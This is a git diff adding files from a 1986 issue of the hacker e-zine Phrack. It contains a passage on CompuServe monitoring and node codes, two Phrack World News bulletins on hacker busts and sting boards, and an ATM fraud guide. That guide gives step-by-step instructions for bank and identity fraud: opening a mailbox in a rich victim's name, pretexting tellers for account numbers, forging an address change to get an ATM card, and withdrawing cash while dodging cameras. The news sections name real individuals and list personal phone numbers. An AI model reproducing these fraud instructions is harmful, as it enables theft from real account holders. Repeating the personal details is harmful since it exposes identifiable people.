+ANYTHING that is said on the system.  This doesn't mean that they do, however.
+For /TALK to be monitored in a Forum or on CB, CIS must first have a court
+order...it is supposedly as illegal as tapping a phone line.  This has been
+done before to catch some major hackers on the system.  /SEN in a SIG is not
+supposedly monitorable....the status on it is the same as on /TALK.  /SCR mode
+on CB or on a SIG is definitely monitorable, especially if the the /SCR key is
+typed on open channel.  Keep /SCR conversations to a minimum.  As far as
+anything else goes, anything said on open channel is quite definitely seen by
+SOMEBODY in the big chair up in Ohio.  It would not surprise me at all if they
+hire people to go through CB Transcripts every day to look for that kind of
+thing.  Also, when you are in COnference mode in a SIG, always check the
+/STAtus of the channel.  If /STA EVER returns that there are more people on the
+channel you are on than the /USERS function does, then you can rest assured
+that the channel is being monitored.
+  Nodes -- When you log on through CIS, you are going through a node.  The node
+takes the form of 3 letters, designating the site of the computer through which
+you are connecting through Compuserve.  An example would be "NYJ" (New York
+City).  There are some special nodes you should know about, though.
+  Tymnet - Anybody logging on through Tymnet will be assigned one of these
+nodes - QAI, QAJ, QAK, QAC, QAM, QAN, QAO, QCA, QCB, QCC, QCE, QCF, QCH.  This
+cannot identify where you are calling from, just that you are logging in
+through the Tymnet network.
+  Telenet - QBA, QBC, QBD, QBG, QBF, QEN, QEI, QEP.
+   Also, another special node would be DB- (DBA, DBB, DBC, etc), which means
+that the user is logging on from Compuserve's Headquarters in Dublin.
+   The way to tell what node somebody is in is by typing /UST on either CO mode
+on a SIG, or CB...the result is like this....
+   Job   User Id   Ch.  Node  Handle
+   ---  ---------- ---  ----  ------
+1)  12  70003,1295  17  CSG   Red Leather
+2) 133  70006,1293  1s  BAF   Surf's Up!
+3)  69  76703,1211 Tlk  BOO   JOE CUFFS
+4)  22  70000,1959  30* DBA   Pig
+  Now, you can tell something specific about each of these four people based on
+the info given above.  Red is in Columbus, Ohio, and is on Channel 17.  She is
+also a Compuserve Employee.  Surf is in Bakersfield, California, and is a
+Customer service personnel.  He is also using /SCRamble.  Joe is in Talk, is a
+sysop on a SIG, and is in Boston, Massachusetts.  This is the format for Talk
+on CB.  Pig is on talk in a SIG, and is a security personnel from Dublin, Ohio.
+ The format for showing if somebody is in /Talk is different on a SIG than in
+regular CB.  Also, the /SEN command is not implemented on CB.
+  Have fun with this...hope it helps.  Distribute the file however you want,
+but make sure the credits stay at the bottom.
+
+(c) 1986 Morgoth/Lotus
diff --git a/phrack8/7.txt b/phrack8/7.txt
new file mode 100644
index 0000000..61110ac
--- /dev/null
+++ b/phrack8/7.txt
@@ -0,0 +1,102 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Eight, Phile #7 of 9
+
+                          Fun with Automatic Tellers
+                                      by
+                               +++The Mentor+++
+
+        Preface:  This is not a particularly easy scam to pull off, as it
+requires either advanced hacking techniques (TRW or banks) or serious balls
+(trashing a private residence or outright breaking & entering), but it can
+be well worth your while to the tune of $500 (five hundred) a day.
+        Laws that will be broken:  Credit Fraud, Wire Fraud, Bank Fraud, Mail
+Fraud, Theft Over $200, Forgery, and possibly a few others in the course of
+setting the scheme up (rape and murder are optional, but recommended.)
+        This all grew from an idea that Poltergeist had about a year ago be-
+fore he turned fed on Extasyy, and Cisban Evil Priest (Android Pope) and my-
+self were implementing it with great success before our untimely arrest and
+recruitment into the service of the State.  It is risky, but no more so than
+some of the more elaborate carding routines floating around.
+        The first step is to target your victim.  The type person you are
+looking for is rich.  Very rich.
+        Now, don't go trying to hit on J.P. Getty or Johnny Carson or some-
+one who carries a high name recognition.  This will just get you into trouble
+as everyone notices a famous person's name floating across their desk.
+        Instead look for someone who owns a chain of hog feed stores or some-
+thing discreet like that.  We targeted a gentleman who is quite active in the
+silver market, owning several mines in South Africa and not wanting this to
+be widely known (he had no desire to be picketed.)
+        Next step, take out a p.o. box in this person's name.  Extasyy wrote
+a good file on obtaining a box under a fake name, I don't know if it's still
+around.  If not, there are several others out there.  (Yeah, I know, this has
+already weeded out the weak of spirit.  Anyone who has gotten this far without
+panic is probably going to get away with it.)
+        Now comes the fun part, requiring some recon on your part.  You need
+to know some fairly serious details about this person's bank dealings.
+        1)  Find out what bank he deals with mainly.  This isn't too dif-
+            ficult, as a quick run through his office trash will usually let
+            you find deposit carbons, withdrawal receipts, or *anything* that
+            has the bank name on it.
+        2)  Find out the account number(s) that he has at the bank.  This can
+            usually be found on the above-mentioned receipts.  If not, you can
+            get them in TRW (easier said than done) or you can con them out of
+            a hassled bank teller over the phone (Use your imagination.  Talk
+            slowly and understandingly and give plausible excuses ["I work for
+            his car dealership, we need to do a transfer into his account"].)
+        2a) [optional]  If you can, find out if he has an ATM (Automatic
+            Teller) card.  You don't need to know numbers or anything, just
+            if a card exists.  This can also be ascertained over the phone
+            if you cajole properly.
+        3)  Armed with this information, go into action.
+                a) Obtain some nice (ivory quality) stationary.  It doesn't
+                   have to be engraved or anything, but a $5 or $10 invest-
+                   ment to put a letterhead with his initials or something
+                   on it couldn't hurt.  But the most important thing is that
+                   it look good.
+                b) Type a nice letter to the bank notifying them of your
+                   address change.  Some banks have forms you have to fill out
+                   for that sort of thing, so you need to check with the bank
+                   first (anonymously, of course).  You will have to have a
+                   good copy of his signature on hand to sign all forms and
+                   letters (again, trash his office).
+                c) Call the bank to verify the new address.
+                d) IMMEDIATELY upon verifying the change of address, send a
+                   second letter.  If he already has an ATM card, request a
+                   second card with the business name engraved in it be sent
+                   for company use.  If he doesn't have an ATM card, the let-
+                   ter should request one for account number xxxxxx.  Ask for
+                   two cards, one with the wife's name, to add authenticity.
+                e) Go to the bank and ask for a list of all ATM's on the
+                   bank's network.  Often the state has laws requiring *all*
+                   machines take *all* cards, so you'll probably be in good
+                   shape.
+                f) Await the arrival of your new card.  The PIN (personal
+                   identification number) is included when they send out a
+                   card.  After picking up the card, forget that you ever
+                   even *knew* where the p.o. box was, and make sure you
+                   didn't leave fingerprints.
+                g) Begin making the maximum daily withdrawal on the card
+                   (in most cases $500/day), using a different machine
+                   each time.  Since many of these machines have cameras
+                   on them, wear a hat & jacket, or a ski mask to be really
+                   paranoid.  To cut the number of trips you have to make
+                   in half, be at an ATM a few minutes before midnight.  Make
+                   one $500 withdrawal right before midnight, and another one
+                   right after.  This cuts down on the number of trips, but
+                   police or bank officials may spot the pattern and start
+                   watching machines around midnight.  Use your own judgement.
+       Conclusion: Before using the card, make sure that all fingerprints are
+wiped from it.  Usually the first hint you will have that they have caught on
+to your scam is that the machine will keep the card.  Also, avoid using mach-
+ines in your own town unless it is a big city (Chicago, Milwaukee, Dallas,
+etc...).
+
+        Well, I hope this file has proved interesting.  Of course, it is only
+intended for entertainment, and I heartily discourage anyone from even *think-
+ing* about trying such a thing.  Jail isn't fun, as I can testify.  So I take
+no responsibility for the misapplication of this information.
+        (But if someone else pulls it off, I wouldn't be averse to hearing
+about it...)
+                        +++The Mentor+++
+                            June 20
diff --git a/phrack8/8.txt b/phrack8/8.txt
new file mode 100644
index 0000000..50e5c86
--- /dev/null
+++ b/phrack8/8.txt
@@ -0,0 +1,467 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Eight, Phile #8 of 9
+
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+PWN                                                                         PWN
+PWN                            Phrack World News                            PWN
+PWN                                                                         PWN
+PWN                          Issue Seven/Part One                           PWN
+PWN                                                                         PWN
+PWN                Compiled and Written by Knight Lightning                 PWN
+PWN                                                                         PWN
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+On The Home Front
+-----------------
+Well lots of things have been happening around here in the past few weeks.
+For starters, I received a call from Ralph Meola.  Apparently someone had left
+his secretary with a message that I had called.  Prior to this, someone named
+Steve had left a message as well which Ralph had assumed was Slave Driver.   He
+called Steve first, mainly to discuss the letter that was sent to him via PWN
+issue V.  Well eventually he got around to calling me.  Not too much was said,
+but he wanted to clear up some misconceptions about his encounter with Sigmund
+Fraud.  Meola claims that he never threatened Sigmund Fraud about getting his
+account to Stronghold East.   Futhermore, he claims only to have called him
+because SF had posted several AT&T Calling Cards on an unnamed west coast bbs.
+Sigmund Fraud still publicly claims that what he said originally was true,
+but privately admitted that he was lying.
+
+Some other developments would include an imposter of myself who is running
+around on bulletin boards.  Two of the boards that he is on include Elite
+Connection (303) and Green Galaxy (714).  I have never called these boards and
+I advise the sysops to remove "my" accounts as this is not me.
+
+On the lighter side, Metal Shop Private now has 20 Megs of online storage.  The
+G-phile library has been re-installed including most of the files from Metal
+Shop AE and Metal Shop Private is once again the official Phrack distribution
+center.
+
+Metal Shop AE is down for the time being because Cheap Shades has left for
+college, but he has since brought forth a new system known as the Quick Shop.
+All former MS AE members have been entered into QS's bbs log.  Metal Shop
+Brewery has lost its modem and its hard drive is fried, so it will be gone for
+a while.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+>From TeleComputist Staff:
+
+We apologize for the unoriginality of the free issue.  The free issue was put
+out with the intentions of gaining the trust of the public and in doing so we
+neglected to come up with completely original material.   However, future
+issues will be much shorter and contain only original information from the
+editor's themselves.
+
+TeleComputist no longer consists of set writers and anyone may submit articles.
+Please note that if you submit an article, make sure that it has not been
+distributed or seen by anyone else, otherwise we will not accept it.
+
+For subscription information and submission of articles;
+
+                            TeleComputist Newsletter
+                                 P.O. Box 2003
+                          Florissant, Missouri 63032
+_______________________________________________________________________________
+
+Boston Busts                                                     August 9, 1986
+------------
+A couple of weeks prior to the above date, Dr. Who came to visit Recent Change
+and The Clashmaster. Well, he apparently had cashed roughly 16 checks belonging
+to one John Martino (a man who lives down the street from him).  Around August
+4, 1986, Dr. Who and Telenet Bob were picked up in a store in North Adams,
+Massachusetts.  They were trying to pass off another check.
+
+The police were on the scene very shortly and they were taken in.  Dr. Who told
+the police inspector about a PDP-11/23 when asked about it.  He had frauded
+this at Harvard University and told them that RC Modeler (also known as Recent
+Change) had it.  They converged on a sleeping RC who confessed everything.
+
+Dr. Who is being charged with 16 counts of theft.
+RC Modeler is being charged with larceny & possibly as an accomplice to theft.
+Telenet Bob is being charged with 1 count of attempted theft.
+
+Dr. Who and RC Modeler are reportedly out of the scene permanently and Dr. Who
+may be serving some prison time.  Also, RC Modeler, when being questioned, was
+asked about Legion of Doom.  This is VERY strange since we cannot figure out
+quite WHY this was asked.
+
+Sysops are asked to clear their accounts form any bbs they were on.
+-------------------------------------------------------------------------------
+The following is the interpretation of the same events as described by the
+Concord Journal.  The real names of the phreaks involved have been censored.
+
+Computer Theft Charge
+---------------------
+An 18-year-old Concord man was charged on August 5, 1986 with stealing a $3,300
+computer [PDP-11/23 with Venix software] from Harvard University and a portable
+stereo from an unknown store by using checks, police allege he knew to be
+forged, to pay for the items, police said.
+
+RC Modeler, was charged with two counts of larceny over $100, police said.
+[Also, accessory to the crime, RC says.]
+
+Police issued a warrant for RC's arrest after being tipped-off by the North
+Adam's police that he had allegedly made purchases with checks they alleged to
+be stolen and forged.
+
+North Adam's police, according to reports, arrested Doctor Who, of Lenox, MA.
+[and Telenet Bob], and charged him with using stolen and forged checks earlier
+this month.  Police said Who told them about RC's purchases.  They said Who
+wrote checks for the purchase of the computer equipment and the stereo for RC.
+-------------------------------------------------------------------------------
+Well, RC might get off with 3 years of probation (including possible drug
+testing according to RC.).  Dr. Who's court set is set for August 25, 1986.
+He will most likely be doing some prison time unfortunately.  Please address
+all further questions to The Clashmaster.
+
+                    Information Provided By The Clashmaster
+_______________________________________________________________________________
+
+
+Portrait Of The Typical Computer Criminal                       August 11, 1986
+-----------------------------------------
+from PC Week Magazine
+
+In studying the typical computer criminal, the National Center for Computer
+Crime Data, in L.A., may have recently shattered some common myths.
+
+Rather than being some genius computer programmer, according to the center's
+recently published report, the typical computer criminal is just that: quite
+typical. He's most often a male, with an average age of 22, and if not, he's
+next likely to be 19. Chances are he's a programmer, but if that job
+description doesn't fit, he's most likely a student or an input clerk.
+
+Less than 5% of the time, this criminal will be either unskilled or unemployed,
+and less than 2%  of the time will he be a computer executive.
+
+In more than 40% of the cases that the center studied, criminals stole money,
+and if cash wasn't their style, they split between stealing information or
+programs and damaging software.
+
+For these crimes, 4/5ths of those caught had to pay a fine or do community
+service or both, or serve less than 6 months in jail.  In close to 1/5th of the
+cases, the criminal's only punishment was to make restitution.
+
+Some notes from Sally Ride:::Space Cadet
+----------------------------------------
+Pisses me off! How dare they suggest we are not GENIUS computer programmers! Oh
+wait a minute, I know why they screwed up the statistics! They haven't caught
+the geniuses, so we throw off the statistical skew since we're still free.
+
+Also I think it's high time computer executives start accounting for their fair
+share of computer crime! They probably don't get in the statistics either since
+they pull off the really big money rip-offs and it doesn't get published by the
+high power companies they work for so the public keeps faith in them.
+
+               Information Provided By Sally Ride:::Space Cadet
+_______________________________________________________________________________
+
+Dan Pasquale:  Still Hostile or Ancient History?              September 8, 1986
+------------------------------------------------
+Some updated information on Sergeant Dan Pasquale (Fremont, CA Police
+Department) aka The Revenger here.  Supposedly he has been calling Oryan QUEST
+on several occasions and filling in Oryan as to his plans on whom to bust.
+However, an investigation into the truth of this matter shows otherwise.
+
+Most recently, Oryan QUEST informed me that Dan Pasquale was  trying to gain
+information on The Yakuza.  I told The Yakuza about this and had him call Dan
+himself to find out what was going on.
+
+Apparently he had no idea of who he was and had no idea of what he was talking
+about. He just said he'd no idea what I was talking about.  He also said that
+he'd heard about a Shooting Shark incident much like this one. The Rocker of
+Speed Demon Elite also has called him claiming a similar story.  The weird
+thing is, he also claims to not have talked to Oryan QUEST since around the
+beginning of summer.  [Please note that Shooting Shark and The Rocker have been
+disliked by Oryan QUEST for some time and that situation has not changed].
+
+Dan seemed pretty lax, didn't get excited, and seemed like a decent person all
+around.  He said he hadn't been on a board for at least 3 months and that board
+was a legit one at that.  He concluded by saying he didn't know who or why
+these rumors were starting up.
+
+Some last things to add, Dan said that he isn't into busting phreaks/hackers
+and all that stuff anymore.  He just proved his point with Phoenix Phortress,
+took his raise, and got out of the deal.  He is now teaching at the academy and
+is doing patrols.  But, aside from that, he claims to have nothing at all to do
+with the modem world.
+
+                  Information Provided By [%] The Yakuza [%]
+
+           Please refer to past issues of Phrack World News for more
+             information on Dan Pasquale and/or Phoenix Phortress
+_______________________________________________________________________________
+
+Zigmond Exposed                                               September 1, 1986
+---------------
+Finally after months of confusion and question, the truth about Daniel Zigmond
+is out.  It would appear that Zigmond is not an on-staff programmer at Carnegie
+Mellon University after all, but instead was a sort of part time worker there.
+Indeed, Daniel just graduated high school with the class of 1986 and currently
+attends the University of Pittsburgh this fall.  He started part time work at
+CMU on April 1, 1984 (April Fools? Not this time).
+
+He does have a book coming out on Lisp programming which is what he did at
+Carnegie Mellon.  All of this information came from his boss at CMU.  As for
+Amiga World, Daniel has submitted a few articles, but he isn't "on staff."
+This came from his Amiga World editor.
+
+The reason there is nothing listed in his TRW account now is obvious since he
+is not old enough to have obtained credit cards, bought a car/house, or much of
+anything else.
+
+Zigmond says he lied about his age because he thought he would get more
+respect.  He thought that people would think he was a rodent if they knew he
+was only 17 years old.
+
+Daniel Zigmond received(s) quite a lot of prank phone calls, including a bomb
+threat that brought the police to his house, and I ask everyone to stop.  He
+tried to screw around with the phreak/hack community, but no damage was done.
+Its time to leave him alone because ragging serves no purpose.
+
+As for his article...only time will tell, but the general idea is that he made
+that up too just so he could become involved with the phreak/hack community.
+
+              Information Provided and Researched by Lucifer 666
+_______________________________________________________________________________
+
+Maxfield Strikes Again                                          August 20, 1986
+----------------------                                          ---------------
+Many of you probably remember a system known as "THE BOARD" in the Detroit 313
+NPA.  The number was 313-592-4143 and the newuser password was
+"HEL-N555,ELITE,3" (then return).  It was kind of unique because it was run off
+of an HP2000 computer.
+
+On the Private Sector BBS (Sponsored by 2600 Magazine), Bill From RNOC had
+posted a list of numbers that were related to John Maxfield and while none of
+the numbers were anything close to the bbs number listed above, Bill reminded
+us that Maxfield was the proud owner of an HP2000 computer.
+
+This started started several people (including Sally Ride:::Space Cadet and
+myself) thinking that there might be a connection.  Using resources that I
+cannot reveal, I was able to prove that "THE BOARD" was indeed a
+Maxfield/BoardScan operation.  I also had learned that the BBS number itself
+really had call forwarding to one of Maxfield's own numbers.  On August 15,
+1986 I made this knowledge semi-public and warned Sally Ride:::Space Cadet and
+Ax Murderer (who lives locally to Maxfield).  Unfortunately these warnings were
+in vain because on August 20, 1986 the following messages were found and sent
+to me by Sally Ride.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+                Welcome to MIKE WENDLAND'S I-TEAM sting board!
+                   (Computer Services Provided By BOARDSCAN)
+                             66 Megabytes Strong
+
+                           300/1200 baud - 24 hours.
+
+                      Three (3) lines = no busy signals!
+                        Rotary hunting on 313-534-0400.
+
+
+Board:   General Information & BBS's
+Message: 41
+Title:   YOU'VE BEEN HAD!!!
+To:      ALL
+From:    HIGH TECH
+Posted:   8/20/86 @ 12.08 hours
+
+Greetings:
+
+You are now on THE BOARD, a "sting" BBS operated by MIKE WENDLAND of the
+WDIV-TV I-Team.  The purpose?  To demonstrate and document the extent of
+criminal and potentially illegal hacking and telephone fraud activity by the
+so-called "hacking community."
+
+Thanks for your cooperation.  In the past month and a half, we've received all
+sorts of information from you implicating many of you to credit card fraud,
+telephone billing fraud, vandalism, and possible break-ins to government or
+public safety computers.  And the beauty of this is we have your posts, your
+E-Mail and--- most importantly ---your REAL names and addresses.
+
+What are we going to do with it?  Stay tuned to News 4.  I plan a special
+series of reports about our experiences with THE BOARD, which saw users check
+in from coast-to-coast and Canada, users ranging in age from 12 to 48.  For our
+regular users, I have been known as High Tech, among other ID's.  John Maxfield
+of Boardscan served as our consultant and provided the HP2000 that this "sting"
+ran on.  Through call forwarding and other conveniences made possible by
+telephone technology, the BBS operated remotely here in the Detroit area.
+
+When will our reports be ready?  In a few weeks.  We now will be contacting
+many of you directly, talking with law enforcement and security agents from
+credit card companies and the telephone services.
+
+It should be a hell of a series.  Thanks for your help.  And don't bother
+trying any harassment.  Remember, we've got YOUR real names.
+
+Mike Wendland
+The I-team
+WDIV, Detroit, MI.
+
+
+Board:   General Information & BBS's
+Message: 42
+Title:   BOARDSCAN
+To:      ALL
+From:    THE REAPER
+Posted:   8/20/86 @ 12.54 hours
+
+This is John Maxfield of Boardscan.  Welcome!  Please address all letter bombs
+to Mike Wendland at WDIV-TV Detroit.  This board was his idea.
+
+The Reaper (a.k.a. Cable Pair)
+
+
+Board:   General Information & BBS's
+Message: 43
+Title:   BOARDSCAN
+To:      ALL
+From:    AX MURDERER
+Posted:   8/20/86 @ 13.30 hours
+
+Hey guys, he really had us for awhile.  For any of you who posted illegal shit,
+I feel sorry for you.  I just can't wait to see his little news article.  Cable
+Pair, do you have some sort of problem?  If you've noticed, just about
+*everything* posted on this board is *legal*!!!  So fuck off!  You wanna get
+nasty?  Well go ahead, call my house!  Threaten me!  HaHaHa, so what are you
+gonna do, take me to court for calling a bbs?  Freedom of speech.  YOU lose!
+
+Ax Murderer
+-------------------------------------------------------------------------------
+Your guess is as good as mine as to what happens next.  For those of you who
+are interested, Mike Wendland can be reached at WDIV-TV, 313-222-0444,
+313-222-0540, 313-222-5000, 313-222-0532.
+
+                            Information Provided by
+
+      Ax Murderer/John Maxfield/Sally Ride:::Space Cadet/Knight Lightning
+                    and the PWN Special Investigation Team
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Maxfield is in general pretty proud of his efforts with THE BOARD.  He says
+that a lot of the people that he voice verified should have known it was him.
+However, it is believed that he had a kid helping him do some of the
+validations.
+
+According to John F. Maxfield the only reason this sting board was done was to
+show "What is currently happening in the phreak/hack community."   He said no
+legal action will be taken at all, and besides, its fattened his "dossiers" on
+a lot of people!
+_______________________________________________________________________________
+
+PWN Quicknotes
+--------------
+There is a bulletin board called Alpha Center in the 514 NPA (Canada) that is
+being run by a guy named Mike Holmes who is writing a book on the personalities
+of phreakers and hackers.  Mike will ask for your real name, address, phone
+number and other things, but it is not completely required.   The board is 300
+baud only.
+
+The name of the book is reported to be "Phreak me out!" and it is supposed to
+be "not about how to phreak or hack, but about hackers lives and their trials
+and tribulations."   If you would like to find out more about this board or the
+book before calling, either contact Attila the Hun or leave Mike Holmes a
+message at his voice mailbox (214)733-5283.   For the general password contact
+anyone of the below contributors, myself or Taran King.
+
+                       Information Provided By (8/1/86)
+
+                 Attila The Hun/Ryche/Sticky Fingers/The Pyro
+-------------------------------------------------------------------------------
+People in foreign countries will soon be able to have the benefits of our
+famous 800 (toll free) numbers.  In place of the 800 number, foreign callers
+will dial 196. This will be followed by a unique prefix and the line number
+from the company's domestic 800 service.
+
+It would work like this: 196-NXX-XXXX.  AT&T will bill and record all these
+calls.  This will give our overseas (and maybe Canada too) friends the
+opportunity to take advantage of the US toll network.
+
+            Information Provided By Sally Ride:::Space Cadet (8/1/86)
+-------------------------------------------------------------------------------
+Mountain States Telephone and Pacific North West Bell are trialing work
+stations to be used to allow operators to work from home via the personal
+computer.  Mountain States Telephone has over 100 people in various occupations
+working from home now, while Pacific North West has just built one entire
+operating office equipped with IBMs and have several employees working remotely
+using the same technology.
+
+           Information Provided By Sally Ride:::Space Cadet (8/8/86)
+-------------------------------------------------------------------------------
+Supposedly, Bug Byter, Soft Jock, Street Urchin, the Bandit, the Gray Elf,
+Sea-Saw, and Quick Zipper have all were busted on August 5, 1986.  It has also
+been reported that Street Urchin has to pay $7000 in restitution.
+
+                Information Provided By Silent Assault (8/8/86)
+-------------------------------------------------------------------------------
+A Commodore Hacker, Hackin Hank was busted for abusing MCI codes and had to pay
+a $2000 phone bill.  He was caught after a person he called was called by MCI
+Investigations.  This person got scared and told them everything he knew.
+
+                   Information Provided By Red Baron (8/8/86)
+-------------------------------------------------------------------------------
+The following two phreaks were sentenced about 2 months prior to the date.
+
+MOB RULES, who was busted for MF Scanning that he had done 2 years previous,
+got 90 days in jail, 360 hours of community service, and 5 years probation.
+
+Video Vance has been given a flat 90 days in jail for being caught with 11
+cases of dynamite.
+
+            Information Provided By <S><C><A><N><M><A><N> (8/8/86)
+-------------------------------------------------------------------------------
+There is a bulletin board in Australia with many users interested in learning
+to phreak and hack.  They need experienced people to converse with.  Tell the
+sysop that you are calling from America.  The number is 61-3-509-9611.
+
+                  Information Provided By Mad Madness (8/14/86)
+-------------------------------------------------------------------------------
+Shadow Hawk 1 was busted for hacking two RSTSs in Chicago.  They acquired all
+of his printouts and disks with information on it. Info by Shadow Hawk 1.
+(8/11/86)
+-------------------------------------------------------------------------------
+The Prophet, formally of the PhoneLine Phantoms, was recently contacted by
+authorities for as yet unknown reasons.  He has had his computer equipment
+confiscated, but as of this writing he has not been formally charged.  And to
+clear up the rumor, I did not have anything to do with it.
+
+                Information Provided By Solid State (8/23/86)
+-------------------------------------------------------------------------------
+Some notes about Night Stalker's bust here, I haven't really talked much to him
+because his phone line is bugged, I could tell that much from all of the clicks
+that I heard after he had hung up while I was still on the line.
+
+Some of the reasons that he may have been busted were that credit Card numbers
+were frequently posted on The Underground and two months ago a member of the
+Underground called the White House with a bomb threat and was later visited by
+the U.S. Secret Service.  They knew this person had used illegal extenders and
+codes to make the call.  They inquired to where he obtained them and he told
+them all about The Underground.
+
+He is currently under surveillance, the Secret Service thinks he is
+transferring funds and have been following him and taking pictures, especially
+when he visited his bank.   That's about all I know...end of the investigation.
+
+                     Information Provided By Night Stalker
+-------------------------------------------------------------------------------
+In the last week of July, Cyclone II mistakenly was playing with a local VAX
+and became a bit careless with his methods.  He was caught.  You may have
+noticed that he hasn't been calling around for quite awhile.  He won't be until
+this mess is cleared up, which should be in the near future.
+
+His computer was confiscated, as well as all of his files, papers, notes, and
+anything else the authorities could find that was illegal.  He is laying low
+and would prefer not to receive too many calls.
+
+                 Information Provided by Cyclone II (8/4/86)
+-------------------------------------------------------------------------------
+For those of us that subscribe to Home Box Office (HBO), did any of you see the
+HBO movie, Apology?   Well the movie was based on fact and being that Apology
+can be accessed from a phone line I feel that it could be considered as
+possibly having something to do with phreaking.   This Apology differs a little
+from the movie, because with this one you can hear other people's Apology's as
+well including the statements made from two phreaks in the Southern Bell area.
+
+These two phone phreaks/hackers/credit carders/anarchists as they described
+themselves apologized for all sorts of crimes including $200,000 phone bills to
+their phone company, bomb threats to their school, and prank calls to Hong
+Kong, Egypt, and London.   One of the phreaks identified themselves as "The
+Cop."  Just thought you might be interested to know about it...-KL
+_______________________________________________________________________________
diff --git a/phrack8/9.txt b/phrack8/9.txt
new file mode 100644
index 0000000..e63e00f
--- /dev/null
+++ b/phrack8/9.txt
@@ -0,0 +1,568 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Eight, Phile #9 of 9
+
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+PWN                                                                         PWN
+PWN                            Phrack World News                            PWN
+PWN                                                                         PWN
+PWN                          Issue Seven/Part Two                           PWN
+PWN                                                                         PWN
+PWN                Compiled and Written by Knight Lightning                 PWN
+PWN                                                                         PWN
+PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+P-80: Sting Board?                                              August 28, 1986
+------------------
+Below is a compilation of miscellaneous messages taken from the Communication/
+Phreak section and the Elite user section of Pirate 80 Systems, a BBS run by
+Scan Man, also known as Scott Higgonbotham.  Everything in []s are notes from
+Sally Ride and myself.
+
+                              *******************
+                              ******        ******
+                              ******        *******
+                              ******        ********
+                              ******        ******
+                              *****************
+                              ******
+                              ******
+                              ******  E I G H T Y
+                              ******
+                              ******
+
+                    FOR THE SERIOUS COMMUNICATIONS HOBBYIST
+                                WELCOME ABOARD
+
+                           <><><><><><><><><><><><>
+                           <> Knowledge is Power <>
+                           <>  Thomas Jefferson  <>
+                           <><><><><><><><><><><><>
+
+            [Enter:  An up and coming young phreaker named Shawn.]
+
+Msg#: 7284 *COMMUNICATIONS*
+05/28/86 19:43:24 (Read 42 Times)
+From: SHAWN
+To: ALL
+Subj: CODES
+
+OK HERE WE GO  800 446 4462 SKYLINE (CODE: XXXXXXX)
+               800 626 9600 CODE (XXXXXXX)
+               800 222 4482 CODE (XXXXXX)
+               800 521 8400 CODE (XXXXXXXX)
+               800 227 0073 CODES (xxxxXxx X=0-9)
+METRO CODES: XXXXXX, XXXXXX, XXXXXX, XXXXXX, XXXXXX
+PBX: 312 455 7287 (CODE XXXX+Y)
+503 652 6016:  ID:  XXX,XXX PASS ****
+
+later,
+          Shawn
+
+[In the above message, the numbers were followed by codes that I have since
+censored out.  This magazine will *NOT* publish codes.]
+-------------------------------------------------------------------------------
+[It's common knowledge that a BBS userlog must be blanked before a BBS can be
+used as a sting board.  I've also heard that law enforcement officials have
+been trying to bust P-80 and Scan Man for a long time, but have not been able
+to accomplish anything.  Even the infamous Detective Dan Pasquale {See past
+issues of Phrack World News, "Phoenix Phortress Stings 7" and "Oryan QUEST Vs.
+Dan Pasquale"} and John Maxfield, head of BoardScan, are frustrated at being
+unable to deal with Scan Man.  On June 20, 1986, or thereabouts, the following
+message appeared in the logon to P-80;
+
+                         "BI-ANNUAL USERLOG CLEANUP IN
+                          EFFECT.  ALL MEMBERS PLEASE
+                          RE-LOGIN AS A NEW USER..."]
+-------------------------------------------------------------------------------
+
+Msg#: 7870 *COMMUNICATIONS*
+06/20/86 22:04:41 (Read 50 Times)
+From: ICARUS 1
+To: ALL
+Subj: TMC BUST
+
+TMC has just nailed a hacker associate of mine for $935.  The destination
+numbers were called and someone spilled their guts.  The guy who got busted
+is worried because the Alliance bills have not come in yet.  TMC users beware.
+Make sure your friends are amnesiacs as the phreaker's bible says.
+
+Icarus
+
+[Some friendly advice from Icarus 1, too bad not everyone heeded the message.]
+-------------------------------------------------------------------------------
+
+Msg#: 7894 *COMMUNICATIONS*
+06/21/86 19:44:09 (Read 44 Times)
+From: ICARUS 1
+To: SCAN MAN (Rcvd)
+Subj: REPLY TO MSG# 7870 (TMC BUST)
+
+He was busted by TMC in the state of Nebraska.
+
+Icarus
+-------------------------------------------------------------------------------
+
+Msg#: 7898 *COMMUNICATIONS*
+06/21/86 20:43:10 (Read 43 Times)
+From: MAX MADDNESS
+To: ICARUS 1 (Rcvd)
+Subj: REPLY TO MSG# 7870 (TMC BUST)
+
+Hey check it out, I use TMC in Youngstown, Ohio (216-743-6533), but when TMC
+calls my phreak friends, they think the calls originate from Akron, Ohio which
+is 60 or so miles away.  So when TMC calls and asks, "Do you know anyone in
+Akron?" people usually are honest and just say no.  So even if I call
++relatives, etc. usually I'm safe.
+
+          Max
+-------------------------------------------------------------------------------
+
+Msg#: 7880 *COMMUNICATIONS*
+06/21/86 05:30:37 (Read 51 Times)
+From: THE FALCON
+To: ALL
+Subj: TMC
+
+What is the number to TMC?  I just want to know so that I'm sure not to use it.
+Oh well, thanx and later.
+
+          \_The Falcon_/
+-------------------------------------------------------------------------------
+
+Msg#: 7952 *COMMUNICATIONS*
+06/23/86 13:06:23 (Read 44 Times)
+From: SHAWN
+To: ICARUS 1 (Rcvd)
+Subj: REPLY TO MSG# 7870 (TMC BUST)
+
+Well I told you guys a while ago that this would happen so stay away from them.
+
+Icarus
+-------------------------------------------------------------------------------
+
+Msg#: 7961 *COMMUNICATIONS*
+06/23/86 17:15:41 (Read 47 Times)
+From: BLADE RUNNER
+To: ALL
+Subj: TMC
+
+I was wandering around some guys hard drive this weekend and found some AT&T
+mail regarding TMC.  From what I understand TMC is involved in the AT&T
+AGETRIAL project.  Which indicates to me that TMC is also into computers and
+consequently knows what a hacker is.  Another thing that was found was some
+information on the 1PSS switch that has been developed by AT&T and has already
+been deployed in dome BOCS and other communications networks.  This troubles me
